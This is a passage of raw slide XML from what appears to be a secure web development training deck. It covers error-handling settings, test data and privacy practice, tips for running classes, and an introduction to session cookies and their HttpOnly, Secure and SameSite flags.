              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ASP.NET:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> &lt;customErrors mode="On" defaultRedirect="~/Error/Oops.aspx" /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>: error_reporting(0);</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Don’t put production data in development and test environments</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use random test data, or tools like RedGate Data Generator to generate semantically valid test data (e.g. “real” names, phone numbers, addresses, product names, etc.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Consult privacy guidelines before releasing any customer information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;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Training Tips</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p13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Create a feedback form that is filled out by your attendees each offering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Be sure to provide many breaks during the day</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Small (~15) class sizes</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914;p134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832399" y="1152475"/>
            <a:ext cx="4059809"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Set “Ground Rules” so students are not getting distracted from the class</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>Handle IT setup logistics prior to the class date</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>Take questions regularly</a:t>
            </a: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61"/>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Session and Cookie Security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Exactly Are Sessions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p162"/>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The HTTP protocol has no inherent idea of state, so several ‘creative’ ways have been developed over the years to fill this gap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Modern apps manage state via browser cookies mapped to server-side data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session cookies associate </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>server-side state with a user </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authentication - Prove an identity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authorization - What can you do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session - AuthN + AuthZ period</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p162"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175725" y="2538375"/>
            <a:ext cx="4812100" cy="2291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63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="59511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Cookies are small pieces of data, sent from a server to a client in the response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They are then sent back to the server in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> header</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There are two types of cookies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Session cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Lack an expiration date and never written to disk. Removed when the browser session is closed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Persistent cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Cookies that contain an expiration date. These cookies are removed on a date/time set when created. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Remember Me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> checkboxes usually create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> cookies, instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> cookies.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p1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 is for Cookie</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p163"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545300" y="1441725"/>
            <a:ext cx="2382200" cy="22600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64"/>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a:t>Cookies can be viewed with browser developer tools </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anyone can modify cookies stored in their browser.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cryptographically signed cookies usually cannot be modified, and are validated by the server. If the cookie was tampered with, the server will reject it</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web sites can set flags on cookies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - The cookie cannot be accessed by JavaScript, and can only be sent over HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - The cookie will only be sent over HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Disables 3rd party usage of cookies. Instead, cookies will only be sent when browsing the same origin directly. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> mode will disable 3rd party usage for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, whereas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Lax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> mode will disable 3rd party usage for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> only</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p1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Secure Are Cookies?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Cookies Look Like?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311775" y="11064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Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Set-Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>SID=118zi7d9834KS91212PAD;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Domain=.google.com; Path=/; httpOnly;     </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>               Expires=Wed, 7 Jun 2018 12:50:11 GMT</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346275" y="2001675"/>
            <a:ext cx="25506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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Cookie Name and Value</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Only required item</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Simple key / value pair</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1147" name="Google Shape;1147;p165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4003299" y="2795850"/>
            <a:ext cx="3152873" cy="8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63F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Where the cookie can be sent</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
